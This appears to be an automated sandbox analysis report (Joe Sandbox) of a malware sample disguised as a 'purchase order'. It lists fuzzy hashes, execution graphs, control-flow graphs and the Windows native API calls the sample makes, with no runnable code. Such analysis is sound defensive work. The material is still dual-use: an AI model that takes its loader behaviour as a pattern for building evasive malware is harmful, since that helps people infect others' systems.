                                                                                                              • Opcode Fuzzy Hash: 5fb55de1f4bee47d072f5bfc4f5fc7bec81bfdaed31be727657f13b55cc0fec4
                                                                                                              • Instruction Fuzzy Hash: EE31AC71D096288BEB68CF5799053DEFAF6AFC9304F04C0AAC50DA6255DB740A85CF51

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.2%
                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                              Signature Coverage:8.3%
                                                                                                              Total number of Nodes:133
                                                                                                              Total number of Limit Nodes:10
                                                                                                              execution_graph 90122 42c403 90123 42c41d 90122->90123 90126 15a2df0 LdrInitializeThunk 90123->90126 90124 42c445 90126->90124 90127 4250c3 90128 4250df 90127->90128 90129 425107 90128->90129 90130 42511b 90128->90130 90131 42ce23 NtClose 90129->90131 90137 42ce23 90130->90137 90133 425110 90131->90133 90134 425124 90140 42f033 RtlAllocateHeap 90134->90140 90136 42512f 90138 42ce3d 90137->90138 90139 42ce4e NtClose 90138->90139 90139->90134 90140->90136 90141 401b81 90142 401b86 90141->90142 90145 430483 90142->90145 90143 401c1a 90143->90143 90148 42ea93 90145->90148 90149 42eab7 90148->90149 90160 407613 90149->90160 90151 42eae0 90152 42eb3c 90151->90152 90163 41b793 90151->90163 90152->90143 90154 42eaff 90155 42eb14 90154->90155 90178 42d1e3 90154->90178 90174 428993 90155->90174 90158 42eb2e 90159 42d1e3 ExitProcess 90158->90159 90159->90152 90162 407620 90160->90162 90181 416af3 90160->90181 90162->90151 90164 41b7bf 90163->90164 90209 41b683 90164->90209 90167 41b7ec 90168 41b7f7 90167->90168 90171 42ce23 NtClose 90167->90171 90168->90154 90169 41b820 90169->90154 90170 41b804 90170->90169 90172 42ce23 NtClose 90170->90172 90171->90168 90173 41b816 90172->90173 90173->90154 90175 4289f4 90174->90175 90177 428a01 90175->90177 90220 418cb3 90175->90220 90177->90158 90179 42d200 90178->90179 90180 42d211 ExitProcess 90179->90180 90180->90155 90183 416b10 90181->90183 90182 416b29 90182->90162 90183->90182 90188 42d863 90183->90188 90185 416b84 90185->90182 90195 4296b3 NtClose LdrInitializeThunk 90185->90195 90187 416bd5 90187->90162 90190 42d87d 90188->90190 90189 42d8ac 90189->90185 90190->90189 90196 42c453 90190->90196 90195->90187 90197 42c46d 90196->90197 90203 15a2c0a 90197->90203 90198 42c499 90200 42ef13 90198->90200 90206 42d193 90200->90206 90202 42d925 90202->90185 90204 15a2c1f LdrInitializeThunk 90203->90204 90205 15a2c11 90203->90205 90204->90198 90205->90198 90207 42d1b0 90206->90207 90208 42d1c1 RtlFreeHeap 90207->90208 90208->90202 90210 41b69d 90209->90210 90214 41b779 90209->90214 90215 42c4f3 90210->90215 90213 42ce23 NtClose 90213->90214 90214->90167 90214->90170 90216 42c50d 90215->90216 90219 15a35c0 LdrInitializeThunk 90216->90219 90217 41b76d 90217->90213 90219->90217 90222 418cdd 90220->90222 90221 4191eb 90221->90177 90222->90221 90223 42ef13 RtlFreeHeap 90222->90223 90224 418e22 90223->90224 90224->90221 90225 42d1e3 ExitProcess 90224->90225 90225->90221 90233 425453 90234 42546c 90233->90234 90235 4254b4 90234->90235 90238 4254f4 90234->90238 90240 4254f9 90234->90240 90236 42ef13 RtlFreeHeap 90235->90236 90237 4254c4 90236->90237 90239 42ef13 RtlFreeHeap 90238->90239 90239->90240 90241 42ffb3 90242 42ffc3 90241->90242 90243 42ffc9 90241->90243 90246 42eff3 90243->90246 90245 42ffef 90249 42d143 90246->90249 90248 42f00e 90248->90245 90250 42d15d 90249->90250 90251 42d16e RtlAllocateHeap 90250->90251 90251->90248 90226 41b983 90228 41b9c7 90226->90228 90227 41b9e8 90228->90227 90229 42ce23 NtClose 90228->90229 90229->90227 90252 414653 90253 41466d 90252->90253 90255 41468b 90253->90255 90258 417e43 90253->90258 90256 4146bf PostThreadMessageW 90255->90256 90257 4146d0 90255->90257 90256->90257 90259 417e67 90258->90259 90260 417e6e 90259->90260 90261 417ea6 LdrLoadDll 90259->90261 90260->90255 90261->90260 90262 41ac13 90263 41ac85 90262->90263 90264 41ac2b 90262->90264 90264->90263 90266 41eb83 90264->90266 90267 41eba9 90266->90267 90271 41eca0 90267->90271 90272 4300e3 90267->90272 90269 41ec3e 90270 42c453 LdrInitializeThunk 90269->90270 90269->90271 90270->90271 90271->90263 90273 430053 90272->90273 90274 42eff3 RtlAllocateHeap 90273->90274 90276 4300b0 90273->90276 90275 43008d 90274->90275 90277 42ef13 RtlFreeHeap 90275->90277 90276->90269 90277->90276 90230 419408 90231 42ce23 NtClose 90230->90231 90232 419412 90231->90232 90278 15a2b60 LdrInitializeThunk 90279 41415e 90280 4140ea 90279->90280 90283 42d0a3 90280->90283 90284 42d0c0 90283->90284 90287 15a2c70 LdrInitializeThunk 90284->90287 90285 4140f5 90287->90285

                                                                                                              Executed Functions

                                                                                                              Function 00417E43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 215 417e43-417e6c call 42faf3 218 417e72-417e80 call 4300f3 215->218 219 417e6e-417e71 215->219 222 417e90-417ea1 call 42e563 218->222 223 417e82-417e8d call 430393 218->223 228 417ea3-417eb7 LdrLoadDll 222->228 229 417eba-417ebd 222->229 223->222 228->229
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                              • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                                                                              • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                              • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795
                                                                                                              Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 258 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                                                                              • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4
                                                                                                              Function 015A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 272 15a2b60-15a2b6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5966bfc03ea03e1ae3cbee57d5dc93f4cca957ffdcf9300e291bf51276140f0c
                                                                                                              • Instruction ID: 2424b8027435b4b7d907b0c9f962e3447dc40e8d9f6d1ca8a8155c3fdbd08c5b
                                                                                                              • Opcode Fuzzy Hash: 5966bfc03ea03e1ae3cbee57d5dc93f4cca957ffdcf9300e291bf51276140f0c
                                                                                                              • Instruction Fuzzy Hash: 9790026120240003410571584854656404EA7E0211B59D421E1015990DC56589916625
                                                                                                              Function 015A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 4c81ede5e3d539b8a7400e1ffbdaff3af37b732945304a049e42157df9f879af
                                                                                                              • Instruction ID: df5acc3ab0c5e9b8a394be58bf754ef9a7b44e1045f01a52d57b894041f49cbb
                                                                                                              • Opcode Fuzzy Hash: 4c81ede5e3d539b8a7400e1ffbdaff3af37b732945304a049e42157df9f879af
                                                                                                              • Instruction Fuzzy Hash: 1890023120140413D11171584944747004DA7D0251F99D812A0425958DD6968A52A621
                                                                                                              Function 015A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 07a4816468730281055ca606d698246594a2de73bd9d7f9e50ded03d1d7b3887
                                                                                                              • Instruction ID: 22f8897e40ffaabad0b342fd0b91b48cc4ac3b9c64e042e8dbc1007ea31d8b0a
                                                                                                              • Opcode Fuzzy Hash: 07a4816468730281055ca606d698246594a2de73bd9d7f9e50ded03d1d7b3887
                                                                                                              • Instruction Fuzzy Hash: BA90023120148802D1107158884478A0049A7D0311F5DD811A4425A58DC6D589917621
                                                                                                              Function 015A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1d438bde73d012e1853eb988919387bf5fda12c259e9201c7a6ada19460b46ce
                                                                                                              • Instruction ID: f2c2860c8d1c327eb398680674d535abe2cd5da8cb2f32ddd77c956932fddc50
                                                                                                              • Opcode Fuzzy Hash: 1d438bde73d012e1853eb988919387bf5fda12c259e9201c7a6ada19460b46ce
                                                                                                              • Instruction Fuzzy Hash: 7390023160550402D100715849547461049A7D0211F69D811A0425968DC7D58A516AA2
                                                                                                              Function 004145AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4145af-4145c9 1 4145cc-414607 0->1 2 414667-4146bd call 417e43 call 404993 call 425593 1->2 3 414609 1->3 20 4146dd-4146e3 2->20 21 4146bf-4146ce PostThreadMessageW 2->21 4 41460a-41460b 3->4 6 414637 4->6 7 41460d-41461f 4->7 6->4 9 414638-41463a 6->9 7->1 16 414621-414628 7->16 12 414644 9->12 13 41463c-414643 9->13 13->12 18 414635-414636 16->18 19 41462a-414633 16->19 18->6 19->18 21->20 22 4146d0-4146da 21->22 22->20
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881
                                                                                                              • Opcode ID: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                                                                              • Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
                                                                                                              • Opcode Fuzzy Hash: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                                                                              • Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5
                                                                                                              Function 0041464A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 23 41464a-414685 call 42efb3 call 42f9c3 28 41468b-4146bd call 404993 call 425593 23->28 29 414686 call 417e43 23->29 34 4146dd-4146e3 28->34 35 4146bf-4146ce PostThreadMessageW 28->35 29->28 35->34 36 4146d0-4146da 35->36 36->34
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881
                                                                                                              • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                                              • Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
                                                                                                              • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                                              • Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5
                                                                                                              Function 00414653 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 37 414653-414665 38 41466d-414685 call 42f9c3 37->38 39 414668 call 42efb3 37->39 42 41468b-4146bd call 404993 call 425593 38->42 43 414686 call 417e43 38->43 39->38 48 4146dd-4146e3 42->48 49 4146bf-4146ce PostThreadMessageW 42->49 43->42 49->48 50 4146d0-4146da 49->50 50->48
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881
                                                                                                              • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                                              • Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
                                                                                                              • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                                              • Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5
                                                                                                              Function 00417F0B Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 231 417f0b-417f14 232 417ea6-417eb7 LdrLoadDll 231->232 233 417f16-417f1c 231->233 235 417eba-417ebd 232->235 234 417f1d 233->234 236 417f1e-417f2a 234->236 237 417f2c 236->237 238 417eec-417f00 237->238 239 417f2e-417f37 237->239 238->237 241 417f02-417f06 238->241 239->234 240 417f39-417f42 239->240 242 417f45-417fa1 240->242 243 417ecf-417ede 240->243 241->236 244 417f08 241->244 246 417ee0-417ee2 243->246 247 417eeb 243->247 244->234 247->238
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                                              • Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
                                                                                                              • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                                              • Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49
                                                                                                              Function 0042D143 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 248 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                              • Instruction ID: 1a0320424f6e2513cda363ed32119c93a96c745f6f302d4d30482123bd46745d
                                                                                                              • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                              • Instruction Fuzzy Hash: F0E06D723042187BC614EE59DC41FDB73ACEFC9710F004419F908A7241CA75BA118BF8
                                                                                                              Function 0042D193 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 253 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                                              • Instruction ID: e28c5f6046658d42be081c83e7545d2ad134910e97977f916db6725ae22c6c78
                                                                                                              • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                                              • Instruction Fuzzy Hash: 19E092723002147BCA10EE5AEC41FEB73ACEFC9710F004019FD08A7241CA78B9118BB8
                                                                                                              Function 0042D1E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 263 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                                                                              • Instruction ID: fa5f5a3ee7dd61a2881b8e9e18f2c3305c63e6423d1f29c247da1a030937b839
                                                                                                              • Opcode Fuzzy Hash: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                                                                              • Instruction Fuzzy Hash: 5FE04F762402147BC510EB5ADC01F97775CEFC5755F508419FA0967142CB75BA11C7B4
                                                                                                              Function 015A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 268 15a2c0a-15a2c0f 269 15a2c1f-15a2c26 LdrInitializeThunk 268->269 270 15a2c11-15a2c18 268->270
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: a4418fd0186ac4561789a3bb32a29006ac3d0c5deb95f0a11bec19691d7c5c8f
                                                                                                              • Instruction ID: 002854d25909da0d1f54e54c18eac486e78d8a12403d6ff9f8502d72c9403792
                                                                                                              • Opcode Fuzzy Hash: a4418fd0186ac4561789a3bb32a29006ac3d0c5deb95f0a11bec19691d7c5c8f
                                                                                                              • Instruction Fuzzy Hash: 6CB09B719415C5D5DA11E7644A0971F794477D0711F59C461D2030A41F4778C1D1E675

                                                                                                              Non-executed Functions

                                                                                                              Function 015E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: a7078e628074b747bee5729a074190b10e8e92ce527d231480ee77d833eac755
                                                                                                              • Instruction ID: c6cb4bc8f66b4cc29c346e264403ea10a070f8a2fab61af91e6131b4bfb98c40
                                                                                                              • Opcode Fuzzy Hash: a7078e628074b747bee5729a074190b10e8e92ce527d231480ee77d833eac755
                                                                                                              • Instruction Fuzzy Hash: B4929071A08342AFE729DF28C889B6BB7E8BB84754F04491DFA95DF250D770E844CB52
                                                                                                              Function 01598620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Critical section address, xrefs: 015D5425, 015D54BC, 015D5534
                                                                                                              • Critical section address., xrefs: 015D5502
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015D54E2
                                                                                                              • Address of the debug info found in the active list., xrefs: 015D54AE, 015D54FA
                                                                                                              • Invalid debug info address of this critical section, xrefs: 015D54B6
                                                                                                              • corrupted critical section, xrefs: 015D54C2
                                                                                                              • Thread identifier, xrefs: 015D553A
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015D540A, 015D5496, 015D5519
                                                                                                              • 8, xrefs: 015D52E3
                                                                                                              • Critical section debug info address, xrefs: 015D541F, 015D552E
                                                                                                              • undeleted critical section in freed memory, xrefs: 015D542B
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015D54CE
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 015D5543
                                                                                                              • double initialized or corrupted critical section, xrefs: 015D5508
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              • Opcode ID: 57aadec1ce537f49259f75cee906cf0d2dc32d6d24cff732724e463db4b2a31a
                                                                                                              • Instruction ID: 4d09036da9bc0ff25a839f75cd74df590f8e71c58f73cda8d2cdb382921926fb
                                                                                                              • Opcode Fuzzy Hash: 57aadec1ce537f49259f75cee906cf0d2dc32d6d24cff732724e463db4b2a31a
                                                                                                              • Instruction Fuzzy Hash: C8816A71A40359AFDB21CF99CC45BAEBBF5BB48B18F10411AF505BF240E775A940CBA0
                                                                                                              Function 015929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015D2412
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015D25EB
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015D2624
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015D2498
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015D22E4
                                                                                                              • @, xrefs: 015D259B
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015D2409
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015D24C0
